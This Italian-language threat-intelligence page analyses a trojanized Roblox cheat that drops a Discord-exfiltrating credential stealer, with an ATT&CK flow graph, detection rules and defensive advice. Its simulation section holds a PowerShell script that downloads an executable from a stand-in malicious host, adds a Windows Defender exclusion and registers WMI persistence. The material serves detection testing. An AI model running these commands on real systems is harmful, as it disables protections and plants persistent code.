Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un pacchetto di cheat per Roblox malevolo combina un’interfaccia .NET trojanizzata con un ladro Python integrato tramite PyInstaller. Il caricatore iniziale indebolisce le protezioni di Microsoft Defender, recupera un payload di seconda fase da MediaFire e avvia malware derivato da Glove Stealer per raccogliere credenziali, cookie, file di portafogli e risorse legate al gaming. I dati rubati vengono quindi esfiltrati attraverso webhook di Discord crittografati e supportati da un bot RAT persistente su Discord.
Indagine
Il rapporto fornisce un’analisi statica approfondita del malware, inclusa l’estrazione del payload di PyInstaller, la decompilazione del bytecode Python 3.12 e la mappatura del flusso di lavoro di furto delle credenziali. Contiene anche la catena di esecuzione multi-stadio completa, i metodi di evasione delle difese utilizzati dagli operatori e l’approccio di bypass a cinque strati che prende di mira le protezioni di Chrome App-Bound Encryption.
Mitigazione
Le organizzazioni dovrebbero bloccare l’esecuzione di binari sconosciuti non firmati, applicare un allow-listing rigoroso delle applicazioni, monitorare i cambiamenti alle esclusioni di Defender e l’uso sospetto di PowerShell, e rilevare download insoliti di dati di configurazione da Pastebin. Il traffico di webhook Discord dovrebbe essere limitato o strettamente monitorato, e i difensori dovrebbero osservare l’attività anomala dei lanci di Chrome che usano flag correlati al debugger.
Risposta
I team di sicurezza dovrebbero allertare sulla creazione di winupdate.exe nella cache AppData, modifiche sospette alle chiavi Run del registro, creazione di attività pianificate e attività inusuali nei canali Discord. I file malevoli dovrebbero essere messi in quarantena, esclusioni non autorizzate in Defender rimosse, e dovrebbero essere condotte analisi forensi su qualsiasi archivio di credenziali che potrebbe essere stato compromesso.
"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffdd99 classDef tool fill:#cccccc classDef process fill:#bbffbb classDef persistence fill:#ff99cc %% Node definitions action_user_execution["<b>Azione</b> – <b>T1204.002 Esecuzione Utente</b><br/>La vittima esegue un esecutore WPF trojanizzato mascherato da strumento di cheat per Roblox."] class action_user_execution action technique_impair_defenses["<b>Tecnica</b> – <b>T1562.001 Menomazione delle Difese: Disabilitare o Modificare Strumenti</b><br/>Aggiunge la directory corrente alla lista delle esclusioni di Windows Defender tramite PowerShell e patcha le funzioni AMSI/ETW."] class technique_impair_defenses technique tool_powershell["<b>Strumento</b><br/>Script PowerShell usato per modificare le esclusioni di Defender e patchare AMSI/ETW."] class tool_powershell tool technique_bypass_uac["<b>Tecnica</b> – <b>T1548.002 Abuso del Controllo di Elevazione: Bypass UAC</b><br/>Compromette HKCUSoftwareClassesms-settingsShellOpencommand e avvia fodhelper.exe/computerdefaults.exe per ottenere esecuzione ad alta integrazione."] class technique_bypass_uac technique tool_fodhelper["<b>Strumento</b><br/>fodhelper.exe utilizzato per il bypass UAC."] class tool_fodhelper tool technique_dead_drop["<b>Tecnica</b> – <b>T1102.001 Servizio Web: Risolutore Dead Drop</b><br/>Recupera configurazioni crittografate XOR da URL di Pastebin e risolve il link per il download di MediaFire."] class technique_dead_drop technique technique_ingress_tool["<b>Tecnica</b> – <b>T1105 Trasferimento Strumento di Ingresso</b><br/>Scarica un ladro Python secondario impacchettato con PyInstaller (winupdate.exe) da MediaFire e lo memorizza in %APPDATA%.cachewinupdate.exe con attributi nascosti e di sistema."] class technique_ingress_tool technique process_secondary_payload["<b>Processo</b><br/>winupdate.exe (ladro Python)"] class process_secondary_payload process technique_cred_browser["<b>Tecnica</b> – <b>T1555.003 Credenziali dai Browser Web</b><br/>Bypass a più stadi della crittografia legata all’app di Chrome (interruzione del debugger, elevazione COM, doppio DPAPI, iniezione DLL, hijack del registro UAC) per ottenere cookie decrittografati, token e password."] class technique_cred_browser technique technique_keylogging["<b>Tecnica</b> – <b>T1056.001 Cattura di Input: Keylogging</b><br/>Installa un hook WH_KEYBOARD_LL di basso livello per catturare le sequenze di tasti."] class technique_keylogging technique technique_archive["<b>Tecnica</b> – <b>T1560.003 Archivio tramite Metodo Personalizzato</b><br/>Impacchetta i file rubati in uno ZIP in-memory, suddiviso in frammenti ≤25 MB."] class technique_archive technique technique_exfiltration["<b>Tecnica</b> – <b>T1041 Esfiltrazione su Canale C2</b><br/>Invia frammenti ZIP a un URL webhook Discord."] class technique_exfiltration technique tool_discord_webhook["<b>Strumento</b><br/>Webhook Discord utilizzato per l’esfiltrazione dei dati."] class tool_discord_webhook tool technique_discord_rath["<b>Tecnica</b> – <b>Discord Bot RAT</b><br/>Utilizza token bot Discord decrittografato e ID canale per ricevere comandi remoti (shell, webcam, traccia, ecc.)."] class technique_discord_rath technique technique_persistence["<b>Tecnica</b> – <b>T1547.001 Esecuzione Automatica all’Avvio/Accesso</b><br/>Crea attività pianificata, chiave Run di HKCU, script VBS di avvio, hijack COM, voce del profilo PowerShell e Sottoscrizione Evento WMI per riavviare il payload dopo il riavvio."] class technique_persistence persistence technique_dynamic_resolution["<b>Tecnica</b> – <b>T1568 Risoluzione Dinamica</b><br/>Ricarica periodicamente la configurazione da Pastebin per adattare gli endpoint C2."] class technique_dynamic_resolution technique %% Connections action_user_execution –>|scatena| technique_impair_defenses technique_impair_defenses –>|utilizza| tool_powershell technique_impair_defenses –>|abilita| technique_bypass_uac technique_bypass_uac –>|utilizza| tool_fodhelper technique_bypass_uac –>|porta a| technique_dead_drop technique_dead_drop –>|recupera| technique_ingress_tool technique_ingress_tool –>|memorizza e avvia| process_secondary_payload process_secondary_payload –>|esegue| technique_cred_browser process_secondary_payload –>|esegue| technique_keylogging process_secondary_payload –>|raccoglie dati per| technique_archive technique_archive –>|prepara dati per| technique_exfiltration technique_exfiltration –>|invia a| tool_discord_webhook tool_discord_webhook –>|alimenta| technique_discord_rath technique_discord_rath –>|mantiene canale di comando per| technique_persistence technique_persistence –>|stabilisce| persistence_mechanisms persistence_mechanisms["<b>Processo</b><br/>Attività programmata / Chiave Run / VBS / Hijack COM / Profilo PowerShell / Evento WMI"] class persistence_mechanisms process technique_persistence –>|supporta| technique_dynamic_resolution technique_dynamic_resolution –>|aggiorna| technique_dead_drop "
Flusso di attacco
Rilevamenti
Possibili Punti di Persistenza [ASEPs – Hive Software/NTUSER] (via registry_event)
Visualizza
LOLBAS WScript / CScript (via process_creation)
Visualizza
Modifica di Esclusioni di Defender Sospetta (via cmdline)
Visualizza
Binary/Scripts Sospetti in Posizione di Avvio Automatico (via file_event)
Visualizza
Tentativo di Comunicazioni con Dominio di Pastebin Sospetto (via proxy)
Visualizza
IOC (HashSha256) da rilevare: Trucchi aiutati dall’intelligenza artificiale & segreti rubati: Smontaggio del ladro Roblox Yuta/Solara
Visualizza
Rilevamento del Patching della Memoria Attiva nel ladro Roblox [Windows Sysmon]
Visualizza
Rilevamento della Manipolazione di Windows Defender Basata su PowerShell [Windows Powershell]
Visualizza
Iniezione Roblox e Manomissione di Windows Defender [Windows Process Creation]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica avversaria (TTP) progettata per innescare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrazione dell’Attacco & Comandi:
- Trasferimento Strumento di Ingresso (T1105): L’attaccante scarica l’esecutore Roblox dannoso (
SLaunch.exe) da un server web compromesso. - Esecuzione con Manomissione Defender (T1548.002): Utilizzando PowerShell, l’attaccante esegue
SLaunch.execon una linea di comando che invocaAdd-MpPreference -ExclusionPath "C:Roblox"per mettere nella lista bianca la cartella di installazione di Roblox, impedendo a Windows Defender di scansionare il payload iniettato. - Persistenza (T1546.003 / T1547.001): Viene creata una sottoscrizione evento WMI per riavviare
SLaunch.exeall’avvio del sistema. - Raccolta delle Credenziali (T1056.001, T1555.003): Mentre l’iniettore è in esecuzione, cattura le sequenze di tasti ed estrae le credenziali Roblox salvate dagli store del browser.
- Trasferimento Strumento di Ingresso (T1105): L’attaccante scarica l’esecutore Roblox dannoso (
-
Script di Test di Regressione: Il seguente script PowerShell riproduce i passaggi 2-3 e genera la telemetria che la regola Sigma si aspetta.
# ------------------------------------------------------------ # Esecuzione Iniettore Roblox + Esclusione Defender (Script TC) # ------------------------------------------------------------ # Percorsi (regolare come necessario) $injectorPath = "C:TempSLaunch.exe" $defenderExcl = "C:Roblox" # 1. Assicurarsi che l'iniettore esista (segnaposto del download) if (-Not (Test-Path $injectorPath)) { Write-Host "Scaricamento dell'iniettore dannoso..." Invoke-WebRequest -Uri "http://malicious.example.com/SLaunch.exe" -OutFile $injectorPath } # 2. Eseguire l'iniettore con la linea di comando per esclusione Defender $cmd = "-run -script `"UpdateSplash.EnsureWindowsDefenderExclusion()`" -Add-MpPreference -ExclusionPath `"$defenderExcl`"" Start-Process -FilePath $injectorPath -ArgumentList $cmd -NoNewWindow # 3. Creare una sottoscrizione evento permanente WMI per la persistenza $wmiFilter = @" SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'SLaunch.exe' "@ $filterPath = "ROOTDEFAULT" $filterName = "RobloxInjectorFilter" $consumerName = "RobloxInjectorConsumer" # Registrare il filtro $filter = Set-WmiInstance -Namespace $filterPath -Class __EventFilter ` -Arguments @{ Name=$filterName; Query=$wmiFilter; EventNamespace='rootcimv2'; QueryLanguage='WQL' } # Registrare il consumatore della linea di comando $consumer = Set-WmiInstance -Namespace $filterPath -Class CommandLineEventConsumer ` -Arguments @{ Name=$consumerName; CommandLineTemplate="`"$injectorPath`"" } # Collegare filtro al consumatore Set-WmiInstance -Namespace $filterPath -Class __FilterToConsumerBinding ` -Arguments @{ Filter=$filter.__PATH; Consumer=$consumer.__PATH } Write-Host "Simulazione completata – la telemetria di rilevamento dovrebbe essere stata generata." -
Comandi di Pulizia: Rimuovere l’esclusione Defender e la sottoscrizione WMI create sopra.
# Rimuovere l'esclusione di Defender Remove-MpPreference -ExclusionPath "C:Roblox" # Eliminare filtro WMI & consumatore $filterPath = "ROOTDEFAULT" Get-WmiObject -Namespace $filterPath -Class __EventFilter -Filter "Name='RobloxInjectorFilter'" | Remove-WmiObject Get-WmiObject -Namespace $filterPath -Class CommandLineEventConsumer -Filter "Name='RobloxInjectorConsumer'" | Remove-WmiObject Get-WmiObject -Namespace $filterPath -Class __FilterToConsumerBinding ` -Filter "Filter=`"__EventFilter.Name='RobloxInjectorFilter'`"" | Remove-WmiObject # Eliminare il binario dell'iniettore Remove-Item -Path "C:TempSLaunch.exe" -Force